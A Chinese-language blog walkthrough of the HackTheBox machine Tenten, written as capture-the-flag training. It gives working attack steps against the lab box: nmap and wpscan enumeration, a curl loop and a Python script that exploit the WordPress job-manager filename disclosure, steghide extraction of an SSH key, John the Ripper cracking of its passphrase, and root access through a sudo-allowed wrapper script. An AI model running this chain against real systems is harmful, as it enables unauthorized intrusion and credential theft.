文章归档

置顶文章

Web安全

Web安全基础

PHP相关

Writeups

靶机系列

HackTheBox

VulnHub

代码审计

PHP代码审计

流量分析

机器学习

基础学习

Python

Python编程

Java

Java编程

算法

Leetcode

随笔

经验

技术

 2020-03-18   1.6k

HTB::Tenten Walkthrough

0x01 Information

0x02 Tools and Tis

  • nmap
  • wpscan
  • JohnTheRipper
  • steghide
  • wordpress job-manager plugin

0x03 Pentesting

nmap扫描靶机端口:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
Nmap scan report for 10.10.10.10
Host is up (0.23s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA)
| 256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA)
|_ 256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.7.3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Job Portal – Just another WordPress site
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.2 - 4.9 (92%), Linux 4.2 (92%), Linux 4.4 (92%), Linux 4.8 (92%), Linux 4.9 (91%), Linux 3.12 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 237.00 ms 10.10.16.1
2 309.00 ms 10.10.10.10

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 541.37 seconds

一看80端口运行wordpress站点,不多BB,直接上wpscan工具扫描:

wpscan使用教程:https://www.cnblogs.com/Xy--1/p/12236684.html

看到这个版本有很多XSS漏洞利用,但是打这个靶机XSS漏洞一般都是没什么作用,接着往下看,发现站点安装了一个job-manager的插件。

点击进入申请职位的页面,发现有一个文件上传的地方,先上传一个正常图片,再到http://10.10.10.10/wp-content/%year%/%month%/%filename%查看发现可以正常显示。再尝试用BurpSuite改一下文件内容:

服务端检测了后缀名,目前已知只能上传jpg,png等图片类型。

https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/

这篇文章提到了一种类似平行越权的手法:http://10.10.10.10/index.php/jobs/apply/8/,这里8类似招聘文章的id,我们可以使用BurpSuite遍历它:

另外,这里扩展一种思路,可以直接写bash脚本跑出来,这种结果更为直观:

1
for i in $(seq 1 20); do echo -n "$i: "; curl -s http://10.10.10.10/index.php/jobs/apply/$i | grep '<title>'; done

id=13的这篇文章标题是HackerAccessGranted,比较可疑,另外id=17的文章标题是我刚刚上传的图片的文件名。这两点结合起来,我们怀疑HackerAccessGranted是不是也是用户上传的一张图片的文件名。但是要访问到这张图片,我们必须知道上传的年份和月份,想到这里,那就写一个Python脚本跑一下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
import requests

website = 'http://10.10.10.10/wp-content/uploads/'
filename = 'HackerAccessGranted'
exts = ['jpg', 'png', 'gif']

for year in range(2016, 2018):
for month in range(1, 13):
for ext in exts:
url = website + str(year) + '/' + "{:02}".format(month) + '/' + filename + '.' + ext
req = requests.get(url)
if req.status_code == 404:
url = website
else:
print('[+] URL Found: ' + url)

得到结果http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg

把图片用binwalk检查一下:

1
2
3
4
5
$ binwalk HackerAccessGranted.jpg 

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01

再用隐写工具steghide提取一下:

1
2
3
$ steghide extract -sf HackerAccessGranted.jpg 
Enter passphrase:
wrote extracted data to "id_rsa".

OK,提取出了id_rsa文件,再用John一把梭

1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ python /usr/share/john/ssh2john.py id_rsa > id_rsa.hash 
$ /sbin/john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
superpassword (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:08 DONE (2020-03-18 10:52) 0.1173g/s 1683Kp/s 1683Kc/s 1683KC/sa6_123..*7¡Vamos!
Session completed

好了,得到了密码,但是现在好像还没有用户名orz…,再用wpscan枚举站点的用户名

1
2
3
4
5
6
7
8
9
10
[i] User(s) Identified:

[+] takis
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://10.10.10.10/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

再用ssh登录靶机,获取user.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
$ ssh -i id_rsa [email protected]
Enter passphrase for key 'id_rsa':
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

65 packages can be updated.
39 updates are security updates.


Last login: Fri May 5 23:05:36 2017
[email protected]:~$ whoami
takis
[email protected]:~$ ls -la /home/takis
total 48
drwx------ 5 takis takis 4096 Apr 12 2017 .
drwxr-xr-x 5 root root 4096 Apr 12 2017 ..
-rw------- 1 root root 1 Dec 24 2017 .bash_history
-rw-r--r-- 1 takis takis 220 Apr 12 2017 .bash_logout
-rw-r--r-- 1 takis takis 3771 Apr 12 2017 .bashrc
drwx------ 2 takis takis 4096 Apr 12 2017 .cache
-rw------- 1 root root 162 Apr 12 2017 .mysql_history
drwxrwxr-x 2 takis takis 4096 Apr 12 2017 .nano
-rw-r--r-- 1 takis takis 655 Apr 12 2017 .profile
drwx------ 2 takis takis 4096 Apr 12 2017 .ssh
-rw-r--r-- 1 takis takis 0 Apr 12 2017 .sudo_as_admin_successful
-r--r--r-- 1 takis takis 33 Apr 12 2017 user.txt
-rw-r--r-- 1 root root 217 Apr 12 2017 .wget-hsts

提权就很简单了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
[email protected]:~$ sudo -l
Matching Defaults entries for takis on tenten:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User takis may run the following commands on tenten:
(ALL : ALL) ALL
(ALL) NOPASSWD: /bin/fuckin
[email protected]:~$ ls -la /bin/fuckin
-rwxr-xr-x 1 root root 24 Apr 12 2017 /bin/fuckin
[email protected]:~$ cat /bin/fuckin
#!/bin/bash
$1 $2 $3 $4
[email protected]:~$ sudo /bin/fuckin cat /root/root.txt
f9f7[------------------]f603

0x04 Summary

Tenten算是一个比较古老的Linux靶机了,就权当开阔知识面,这个靶机的风格和CTF的比赛题很像,通过找wordpress站点的插件漏洞,以及常见的wordpress上传路径来找到隐写id_rsa文件的图片。之后的过程就是比较简单的提权操作了,方法有很多。这个靶机算是比较简单的吧,写了一个小脚本来爆破目录,一天搞定,明天继续。

Copyright © ca01h 2019-2020 | 本站总访问量